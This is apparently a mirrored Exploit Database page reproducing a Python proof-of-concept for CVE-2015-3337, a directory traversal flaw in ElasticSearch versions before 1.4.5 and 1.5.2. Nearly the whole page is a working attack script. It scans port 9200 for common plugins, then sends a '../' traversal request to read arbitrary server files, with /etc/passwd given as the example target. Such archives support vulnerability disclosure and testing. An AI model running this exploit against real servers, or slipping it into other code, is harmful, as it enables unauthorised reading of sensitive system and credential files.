ElasticSearch < 1.4.5 / < 1.5.2 - Directory Traversal

• Exploit Database
• 129 阅读

• 作者： pandujar
  日期： 2015-05-18
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/37054/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57

  #!/usr/bin/python # Crappy PoC for CVE-2015-3337 - Reported by John Heasman of DocuSign # Affects all ElasticSearch versions prior to 1.5.2 and 1.4.5 # Pedro Andujar || twitter: pandujar || email: @segfault.es || @digitalsec.net # Tested on default Linux (.deb) install /usr/share/elasticsearch/plugins/ # # Source: https://github.com/pandujar/elasticpwn/   import socket, sys   print "!dSR ElasticPwn - for CVE-2015-3337\n" if len(sys.argv) <> 3: print "Ex: %s www.example.com /etc/passwd" % sys.argv[0] sys.exit()   port = 9200 # Default ES http port host = sys.argv[1] fpath = sys.argv[2]   def grab(plugin): socket.setdefaulttimeout(3) s = socket.socket() s.connect((host,port)) s.send("GET /_plugin/%s/../../../../../..%s HTTP/1.0\n" "Host: %s\n\n" % (plugin, fpath, host)) file = s.recv(2048) print " [*] Trying to retrieve %s:" % fpath if ("HTTP/1.0 200 OK" in file): print "\n%s" % file else: print "[-] File Not Found, No Access Rights or System Not Vulnerable"   def pfind(plugin): try: socket.setdefaulttimeout(3) s = socket.socket() s.connect((host,port)) s.send("GET /_plugin/%s/ HTTP/1.0\n" "Host: %s\n\n" % (plugin, host)) file = s.recv(16) print "[*] Trying to find plugin %s:" % plugin if ("HTTP/1.0 200 OK" in file): print "[+] Plugin found!" grab(plugin) sys.exit() else: print "[-]Not Found " except Exception, e: print "[-] Error connecting to %s: %s" % (host, e) sys.exit()   # Include more plugin names to check if they are installed pluginList = [&apos;test&apos;,&apos;kopf&apos;, &apos;HQ&apos;, &apos;marvel&apos;, &apos;bigdesk&apos;, &apos;head&apos;]   for plugin in pluginList: pfind(plugin)